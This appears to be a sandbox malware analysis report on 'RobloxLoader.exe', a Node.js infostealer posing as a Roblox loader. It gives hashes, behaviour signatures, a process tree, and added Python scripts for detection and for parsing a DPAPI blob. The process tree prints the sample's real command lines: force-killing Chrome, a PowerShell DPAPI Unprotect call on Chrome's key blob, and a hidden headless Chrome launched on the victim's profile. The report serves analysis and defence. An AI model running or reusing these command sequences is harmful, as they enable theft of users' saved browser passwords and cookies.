Analysis
  max time kernel: 63s
  max time network: 68s
  platform: windows10-2004_x64
  resource: win10v2004-20241007-en
  resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  submitted: 27-10-2024 16:44

Static task: static1
Behavioral task: behavioral1
  Sample: RobloxLoader.exe
  Resource: win7-20241010-en
General
  Target: RobloxLoader.exe
  Size: 36.9MB
  MD5: c1f06056c5480224c8f4139028ca5f8e
  SHA1: aa32bc3480ce763e720d47c2a47907df47f930b0
  SHA256: 4d9b1a73f95cc6a00e7f2cd032c4f877fc15bf66d4f6ec9b61b18e37e791750f
  SHA512: f8289ebd899772487dc3a3cddd1d69ca8bbc30526c946b8a1fe910cfcfb18335847008b521c228d0dd522d619e65c43cbf4a87cf81492f96550511a13edef10b
  SSDEEP: 393216:qQgHDlanaGBXvDKtz+bhPWES4tiNQPNrIKc4gaPbUAgrO4mgl96l+ZArYsFRlPy9:q3on1HvSzxAMNlFZArYsX1Ys3WL/
Malware Config
Signatures

Checks computer location settings (2 TTPs, 1 IoC)
  Looks up the country code configured in the registry, likely a geofence.
  Key value queried: \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation (RobloxLoader.exe)

Loads dropped DLL (2 IoCs)
  PID 2160 RobloxLoader.exe (2 events)

Reads user/profile data of web browsers (3 TTPs)
  Infostealers often target stored browser data, which can include saved credentials, cookies and similar secrets.

An obfuscated cmd.exe command-line is typically used to evade detection (1 IoC)
  PID 3584 cmd.exe
  Note: the flagged command line (see the process tree) is not obfuscated in the usual sense. It is a cleartext cmd.exe /d /s /c wrapper around a PowerShell call to [System.Security.Cryptography.ProtectedData]::Unprotect with the DPAPI blob inlined as a 288-element byte array; the heuristic has most likely fired on that long numeric array.

Drops file in Program Files directory (2 IoCs)
  File opened for modification: C:\Program Files\Google\Chrome\Application\debug.log (chrome.exe)
  File opened for modification: C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log (chrome.exe)
  Note: both writes are Chrome's own debug.log, produced by the headless chrome.exe instance the sample launched. They are a side effect of that launch, not a dropped payload.

Kills process with taskkill (2 IoCs)
  PID 1988 taskkill.exe
  PID 1384 taskkill.exe

Suspicious behavior: EnumeratesProcesses (64 IoCs)
  PID 5088 powershell.exe (2 events)
  PID 2160 RobloxLoader.exe (remaining 62 events)

Suspicious use of AdjustPrivilegeToken (45 IoCs)
  PID 1816 WMIC.exe, twice in succession, each time the same set (42 events): SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, and privilege LUIDs 33, 34, 35, 36
  PID 1988 taskkill.exe: SeDebugPrivilege
  PID 5088 powershell.exe: SeDebugPrivilege
  PID 1384 taskkill.exe: SeDebugPrivilege
  Note: WMIC.exe requests that whole privilege set on every start, so the 42 WMIC events are attributable to the "wmic logicaldisk get name" query rather than to anything the sample does itself; taskkill /F and PowerShell enabling SeDebugPrivilege is likewise their normal behaviour. None of this is a privilege escalation; the sample runs entirely as the logged-on user.

Suspicious use of WriteProcessMemory (64 IoCs)
  Listed as writer → target (sandbox process index, event count):
  PID 2160 RobloxLoader.exe → PID 1848 cmd.exe (86, 2)
  PID 1848 cmd.exe → PID 1816 WMIC.exe (88, 2)
  PID 2160 RobloxLoader.exe → PID 664 cmd.exe (91, 2)
  PID 664 cmd.exe → PID 1988 taskkill.exe (93, 2)
  PID 2160 RobloxLoader.exe → PID 3584 cmd.exe (94, 2)
  PID 3584 cmd.exe → PID 5088 powershell.exe (96, 2)
  PID 2160 RobloxLoader.exe → PID 3184 cmd.exe (99, 2)
  PID 3184 cmd.exe → PID 1384 taskkill.exe (101, 2)
  PID 2160 RobloxLoader.exe → PID 4600 chrome.exe (102, 2)
  PID 4600 chrome.exe → PID 2820 chrome.exe (103, 2)
  PID 4600 chrome.exe → PID 1052 chrome.exe (104, 41)
  PID 4600 chrome.exe → PID 4236 chrome.exe (106, 2)
  PID 4600 chrome.exe → PID 1532 chrome.exe (107, 1; the list is capped at 64 IoCs)
  Note: every pair above is a parent writing into a child it has just created, which is what CreateProcess does; these events document the process tree, not injection into a foreign process.
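The signatures above fire one at a time, but what a defender should key on is their co-occurrence under a single parent: a forced kill of chrome.exe, a cmd.exe/powershell.exe call to ProtectedData::Unprotect, and a headless chrome.exe started on the user's own User Data directory, all descending from RobloxLoader.exe. The script below is an added example written for this page, not code from the sandbox or from the sample. It runs over constructed process-creation events (fields modelled on Sysmon Event ID 1; PIDs, images and command lines copied from the process tree further down, with the DPAPI byte array abbreviated to its first eight bytes, plus an invented benign Chrome launch from Explorer that must not be flagged) and correlates technique hits by root ancestor rather than alerting on single events.

```python
"""Correlate the stealer chain from the process tree: browser kill, DPAPI unprotect
through a shell, and a headless browser launched on the victim's real profile."""
import re

# Constructed process-creation events. PIDs, images and command lines come from the
# sandbox process tree (DPAPI byte array abbreviated); the last two events are an
# invented benign baseline (a user starting Chrome from Explorer).
EVENTS = [
    {"pid": 2160, "ppid": 1, "image": r"C:\Users\Admin\AppData\Local\Temp\RobloxLoader.exe",
     "cmdline": r'"C:\Users\Admin\AppData\Local\Temp\RobloxLoader.exe"'},
    {"pid": 1848, "ppid": 2160, "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": r'C:\Windows\system32\cmd.exe /d /s /c "wmic logicaldisk get name"'},
    {"pid": 664, "ppid": 2160, "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": r'C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM chrome.exe"'},
    {"pid": 1988, "ppid": 664, "image": r"C:\Windows\system32\taskkill.exe",
     "cmdline": "taskkill /F /IM chrome.exe"},
    {"pid": 3584, "ppid": 2160, "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": r'''C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223), $null, 'CurrentUser')"'''},
    {"pid": 5088, "ppid": 3584, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223), $null, 'CurrentUser')"},
    {"pid": 4600, "ppid": 2160, "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "cmdline": r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --profile-directory="Default" --headless --window-position=-10000,-10000'},
    {"pid": 1052, "ppid": 4600, "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "cmdline": r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --use-angle=swiftshader-webgl'},
    {"pid": 7000, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 7001, "ppid": 7000, "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "cmdline": r'"C:\Program Files\Google\Chrome\Application\chrome.exe"'},
]

BROWSER_IMAGES = ("chrome", "msedge", "firefox", "brave", "opera")
# taskkill, optionally with .exe, then anything up to "/IM <browser>.exe" (input is lowercased).
_KILL_RE = re.compile(r"taskkill(?:\.exe)?\b.*?/im\s+(?:%s)\.exe" % "|".join(BROWSER_IMAGES))


def match_techniques(event):
    """Technique tags a single process-creation event satisfies (empty list if none)."""
    cmd = event["cmdline"].lower()
    hits = []
    if _KILL_RE.search(cmd):
        hits.append("browser_kill")
    # Matches both the .NET wrapper used here and the raw Win32 API name.
    if "protecteddata]::unprotect" in cmd or "cryptunprotectdata" in cmd:
        hits.append("dpapi_unprotect_in_shell")
    # Headless launch on a real profile directory. Chrome's own helper children carry
    # --type=<role>; exclude them so one launch does not count several times.
    if ("--headless" in cmd and "--user-data-dir=" in cmd
            and "\\user data" in cmd and "--type=" not in cmd):
        hits.append("headless_browser_on_user_profile")
    return hits


def detect(events, min_techniques=2):
    """Group technique hits by root ancestor; report roots with >= min_techniques distinct hits."""
    by_pid = {e["pid"]: e for e in events}

    def root_of(pid):
        seen = set()
        while by_pid[pid]["ppid"] in by_pid and pid not in seen:
            seen.add(pid)
            pid = by_pid[pid]["ppid"]
        return pid

    trees = {}
    for ev in events:
        hits = match_techniques(ev)
        if not hits:
            continue
        root = root_of(ev["pid"])
        entry = trees.setdefault(root, {"root_image": by_pid[root]["image"],
                                        "techniques": set(), "pids": set()})
        entry["techniques"].update(hits)
        entry["pids"].add(ev["pid"])
    return {r: t for r, t in trees.items() if len(t["techniques"]) >= min_techniques}


if __name__ == "__main__":
    for root, finding in detect(EVENTS).items():
        print(f"root PID {root} {finding['root_image']}: "
              f"{sorted(finding['techniques'])} via PIDs {sorted(finding['pids'])}")
```

Run against the constructed events, the only root reported is PID 2160 (RobloxLoader.exe) with all three techniques, reached through PIDs 664, 1988, 3584, 5088 and 4600; the benign Explorer-launched Chrome and Chrome's own gpu-process child produce no hits. Requiring two distinct techniques under one ancestor is what keeps a lone "taskkill /IM chrome.exe" from a support script, or a legitimate headless Chrome job, from paging anyone.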
Processes

C:\Users\Admin\AppData\Local\Temp\RobloxLoader.exe  (PID 2160, depth 1)
  cmdline: "C:\Users\Admin\AppData\Local\Temp\RobloxLoader.exe"
  - Checks computer location settings
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory

    C:\Windows\system32\cmd.exe  (PID 1848, depth 2)
      cmdline: C:\Windows\system32\cmd.exe /d /s /c "wmic logicaldisk get name"
      - Suspicious use of WriteProcessMemory

        C:\Windows\System32\Wbem\WMIC.exe  (PID 1816, depth 3)
          cmdline: wmic logicaldisk get name
          - Suspicious use of AdjustPrivilegeToken

    C:\Windows\system32\cmd.exe  (PID 664, depth 2)
      cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM chrome.exe"
      - Suspicious use of WriteProcessMemory

        C:\Windows\system32\taskkill.exe  (PID 1988, depth 3)
          cmdline: taskkill /F /IM chrome.exe
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken

    C:\Windows\system32\cmd.exe  (PID 3584, depth 2)
      cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,2,142,118,8,95,31,118,64,160,100,56,129,213,73,187,252,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,233,113,106,0,247,215,176,4,214,100,69,24,12,82,184,99,251,48,99,62,224,63,15,20,29,91,157,107,67,169,249,96,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,252,121,179,237,157,205,101,66,46,197,237,84,78,146,147,24,228,86,99,11,181,9,197,187,81,221,135,249,220,177,151,54,48,0,0,0,201,32,108,188,0,214,238,125,56,14,128,232,126,3,179,153,60,210,117,251,33,154,83,61,107,79,102,158,116,82,197,193,171,143,252,200,195,47,26,56,146,47,159,112,126,10,213,222,64,0,0,0,126,107,51,243,210,113,53,220,214,140,169,196,68,149,197,199,57,133,144,71,163,241,191,42,246,87,185,8,107,45,47,241,156,235,130,58,10,186,143,102,250,211,197,126,173,68,108,167,40,14,195,38,121,76,232,215,128,91,229,33,134,94,213,207), $null, 'CurrentUser')"
      - An obfuscated cmd.exe command-line is typically used to evade detection.
      - Suspicious use of WriteProcessMemory

        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 5088, depth 3)
          cmdline: powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,2,142,118,8,95,31,118,64,160,100,56,129,213,73,187,252,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,233,113,106,0,247,215,176,4,214,100,69,24,12,82,184,99,251,48,99,62,224,63,15,20,29,91,157,107,67,169,249,96,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,252,121,179,237,157,205,101,66,46,197,237,84,78,146,147,24,228,86,99,11,181,9,197,187,81,221,135,249,220,177,151,54,48,0,0,0,201,32,108,188,0,214,238,125,56,14,128,232,126,3,179,153,60,210,117,251,33,154,83,61,107,79,102,158,116,82,197,193,171,143,252,200,195,47,26,56,146,47,159,112,126,10,213,222,64,0,0,0,126,107,51,243,210,113,53,220,214,140,169,196,68,149,197,199,57,133,144,71,163,241,191,42,246,87,185,8,107,45,47,241,156,235,130,58,10,186,143,102,250,211,197,126,173,68,108,167,40,14,195,38,121,76,232,215,128,91,229,33,134,94,213,207), $null, 'CurrentUser')
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken

    C:\Windows\system32\cmd.exe  (PID 3184, depth 2)
      cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM chrome.exe"
      - Suspicious use of WriteProcessMemory

        C:\Windows\system32\taskkill.exe  (PID 1384, depth 3)
          cmdline: taskkill /F /IM chrome.exe
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken

    C:\Program Files\Google\Chrome\Application\chrome.exe  (PID 4600, depth 2)
      cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --profile-directory="Default" --headless --window-position=-10000,-10000
      - Suspicious use of WriteProcessMemory

        C:\Program Files\Google\Chrome\Application\chrome.exe  (PID 2820, depth 3, crashpad handler)
          cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff97478cc40,0x7ff97478cc4c,0x7ff97478cc58

        C:\Program Files\Google\Chrome\Application\chrome.exe  (PID 1052, depth 3, GPU process)
          cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --use-angle=swiftshader-webgl --headless --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --field-trial-handle=1436,i,10202923576128820199,12732699221550718157,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1428 /prefetch:2

        C:\Program Files\Google\Chrome\Application\chrome.exe  (PID 4236, depth 3, network service)
          cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --field-trial-handle=1752,i,10202923576128820199,12732699221550718157,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1748 /prefetch:3

        C:\Program Files\Google\Chrome\Application\chrome.exe  (PID 1532, depth 3, renderer)
          cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --allow-pre-commit-input --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --field-trial-handle=1788,i,10202923576128820199,12732699221550718157,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1780 /prefetch:1
          - Drops file in Program Files directory

Reading the tree: everything is driven from RobloxLoader.exe (PID 2160) through cmd.exe /d /s /c wrappers, in this order: (1) enumerate drive letters with "wmic logicaldisk get name"; (2) force-kill every chrome.exe, which releases Chrome's lock on the User Data directory and on its SQLite databases; (3) have powershell.exe call ProtectedData::Unprotect in CurrentUser scope on a DPAPI blob whose embedded description string reads "Google Chrome", consistent with the DPAPI-wrapped key Chrome keeps in its Local State file to encrypt stored cookies and passwords (this needs no elevation because the sample already runs as the victim user); (4) kill chrome.exe again; (5) start its own headless chrome.exe on the victim's real profile with the window parked at -10000,-10000 so nothing appears on screen. What that headless instance was then used for is not visible in this report: its command line carries no remote-debugging flags and the Network section below is empty. The four chrome.exe children (crashpad handler, GPU process, network service, renderer) are ordinary Chrome helper processes, and the debug.log writes attributed to the renderer are Chrome's own.
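The byte array passed to ProtectedData::Unprotect above is not opaque: it is a complete DPAPI CryptProtectData blob, and its header can be read without any key. The parser below is an added example written for this page (not code from the sandbox, from Chrome or from the sample); the bytes are copied verbatim from the powershell.exe command line. It recovers the blob's description string, the GUID of the DPAPI master key the victim's profile must hold, the cipher and hash algorithms, the protection scope and the ciphertext length. It does not decrypt anything, since that requires the victim user's master key.

```python
"""Parse the DPAPI blob handed to ProtectedData::Unprotect by the powershell.exe step above."""
import struct
import uuid

# The byte array exactly as it appears in the powershell.exe command line (PID 5088),
# split here by DPAPI blob field so the layout is visible.
BLOB = bytes([
    1, 0, 0, 0,                                                              # dwVersion = 1
    208, 140, 157, 223, 1, 21, 209, 17, 140, 122, 0, 192, 79, 194, 151, 235,  # guidProvider
    1, 0, 0, 0,                                                              # dwMasterKeyVersion
    2, 142, 118, 8, 95, 31, 118, 64, 160, 100, 56, 129, 213, 73, 187, 252,    # guidMasterKey
    16, 0, 0, 0,                                                             # dwFlags
    28, 0, 0, 0,                                                             # dwDescriptionLen
    71, 0, 111, 0, 111, 0, 103, 0, 108, 0, 101, 0, 32, 0,                    # szDescription (UTF-16LE)
    67, 0, 104, 0, 114, 0, 111, 0, 109, 0, 101, 0, 0, 0,
    16, 102, 0, 0, 0, 1, 0, 0,                                               # algCrypt, dwAlgCryptLen
    32, 0, 0, 0,                                                             # dwSaltLen
    233, 113, 106, 0, 247, 215, 176, 4, 214, 100, 69, 24, 12, 82, 184, 99,
    251, 48, 99, 62, 224, 63, 15, 20, 29, 91, 157, 107, 67, 169, 249, 96,
    0, 0, 0, 0,                                                              # dwHmacKeyLen (none)
    14, 128, 0, 0, 0, 2, 0, 0,                                               # algHash, dwAlgHashLen
    32, 0, 0, 0,                                                             # dwHmac2KeyLen
    252, 121, 179, 237, 157, 205, 101, 66, 46, 197, 237, 84, 78, 146, 147, 24,
    228, 86, 99, 11, 181, 9, 197, 187, 81, 221, 135, 249, 220, 177, 151, 54,
    48, 0, 0, 0,                                                             # dwDataLen
    201, 32, 108, 188, 0, 214, 238, 125, 56, 14, 128, 232, 126, 3, 179, 153,
    60, 210, 117, 251, 33, 154, 83, 61, 107, 79, 102, 158, 116, 82, 197, 193,
    171, 143, 252, 200, 195, 47, 26, 56, 146, 47, 159, 112, 126, 10, 213, 222,
    64, 0, 0, 0,                                                             # dwSignLen
    126, 107, 51, 243, 210, 113, 53, 220, 214, 140, 169, 196, 68, 149, 197, 199,
    57, 133, 144, 71, 163, 241, 191, 42, 246, 87, 185, 8, 107, 45, 47, 241,
    156, 235, 130, 58, 10, 186, 143, 102, 250, 211, 197, 126, 173, 68, 108, 167,
    40, 14, 195, 38, 121, 76, 232, 215, 128, 91, 229, 33, 134, 94, 213, 207,
])

# Provider GUID every CryptProtectData blob carries in its header.
DPAPI_PROVIDER_GUID = uuid.UUID("df9d8cd0-1501-11d1-8c7a-00c04fc297eb")
# wincrypt.h ALG_ID values commonly found in DPAPI blobs.
ALG_NAMES = {0x6603: "CALG_3DES", 0x6610: "CALG_AES_256", 0x8004: "CALG_SHA1",
             0x800C: "CALG_SHA_256", 0x800E: "CALG_SHA_512"}
CRYPTPROTECT_LOCAL_MACHINE = 0x4


def _u32(buf, off):
    return struct.unpack_from("<I", buf, off)[0], off + 4


def _guid(buf, off):
    return uuid.UUID(bytes_le=bytes(buf[off:off + 16])), off + 16


def _counted(buf, off):
    """A DWORD length followed by that many bytes."""
    n, off = _u32(buf, off)
    if off + n > len(buf):
        raise ValueError("length field runs past the end of the blob")
    return buf[off:off + n], off + n


def parse_dpapi_blob(buf):
    """Walk the CryptProtectData blob layout and return its header fields.
    pbData is ciphertext under a key derived from the user's DPAPI master key,
    which this script does not have; nothing here decrypts."""
    off = 0
    version, off = _u32(buf, off)
    provider, off = _guid(buf, off)
    if version != 1 or provider != DPAPI_PROVIDER_GUID:
        raise ValueError("not a DPAPI CryptProtectData blob")
    _mk_version, off = _u32(buf, off)
    master_key, off = _guid(buf, off)
    flags, off = _u32(buf, off)
    desc, off = _counted(buf, off)
    alg_crypt, off = _u32(buf, off)
    alg_crypt_bits, off = _u32(buf, off)
    salt, off = _counted(buf, off)
    _hmac_key, off = _counted(buf, off)
    alg_hash, off = _u32(buf, off)
    alg_hash_bits, off = _u32(buf, off)
    hmac2_key, off = _counted(buf, off)
    data, off = _counted(buf, off)
    sign, off = _counted(buf, off)
    if off != len(buf):
        raise ValueError(f"{len(buf) - off} trailing bytes after the signature")
    return {
        # Names the file under %APPDATA%\Microsoft\Protect\<SID>\ that can unwrap this blob.
        "master_key_guid": str(master_key),
        "flags": flags,
        "machine_scope": bool(flags & CRYPTPROTECT_LOCAL_MACHINE),
        "description": desc.decode("utf-16-le").rstrip("\x00"),
        "alg_crypt": ALG_NAMES.get(alg_crypt, hex(alg_crypt)),
        "alg_crypt_bits": alg_crypt_bits,
        "alg_hash": ALG_NAMES.get(alg_hash, hex(alg_hash)),
        "alg_hash_bits": alg_hash_bits,
        "salt_len": len(salt),
        "hmac2_key_len": len(hmac2_key),
        "ciphertext_len": len(data),
        "signature_len": len(sign),
    }


if __name__ == "__main__":
    for field, value in parse_dpapi_blob(BLOB).items():
        print(f"{field:>16}: {value}")
```

On this blob the parser reports description "Google Chrome", CALG_AES_256 with CALG_SHA_512, user (not machine) scope, master key 08768e02-1f5f-4076-a064-3881d549bbfc and a 48-byte ciphertext, i.e. a 32-byte key plus one 16-byte CBC padding block. That matches the DPAPI-wrapped AES-256-GCM key Chrome keeps base64-encoded, with a leading "DPAPI" tag, under os_crypt.encrypted_key in its Local State file; the loader has evidently stripped the tag and the base64 layer before handing the raw blob to PowerShell. For a responder, the master key GUID identifies which file under the victim's %APPDATA%\Microsoft\Protect\<SID>\ directory was consumed, and the CurrentUser scope confirms why no elevation was needed.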
Network
MITRE ATT&CK Enterprise v15
Downloads

(path not recorded in this report)
  Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.node
  Filesize: 1.8MB
  MD5: 66a65322c9d362a23cf3d3f7735d5430
  SHA1: ed59f3e4b0b16b759b866ef7293d26a1512b952e
  SHA256: f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c
  SHA512: 0a44d12852fc4c74658a49f886c4bc7c715c48a7cb5a3dcf40c9f1d305ca991dd2c2cb3d0b5fd070b307a8f331938c5213188cbb2d27d47737cc1c4f34a1ea21
  Note: the directory name equals the file's own SHA256, which is how pkg (the Node.js single-executable bundler) unpacks bundled native addons into %TEMP%\pkg\<hash>\ at run time. Together with the "Loads dropped DLL" hits on PID 2160 this identifies RobloxLoader.exe as a pkg-built Node.js application that loads the sqlite3 binding, the library needed to query SQLite databases such as Chrome's Login Data and Cookies files. The 36.9MB size of the sample is consistent with an embedded Node runtime.

(path not recorded in this report)
  Filesize: 274KB
  MD5: 7cbb230781b09f0543c935ce1d17dad0
  SHA1: 84d30df3dd76a7bd50ce54ae461277002abd619e
  SHA256: 90d39ca6189c82070a36a8f7784fb44578d05ba4c043ba42d254b76bcfe47a4d
  SHA512: 14a9964bbde4e2c05077bfabb518a99e6108fb3dc4acc69905fbfa2f295b119edfdd3f758d8913fd1faac96c18c90e6b97cc14568e931d0732e8b1a24e5d5fdf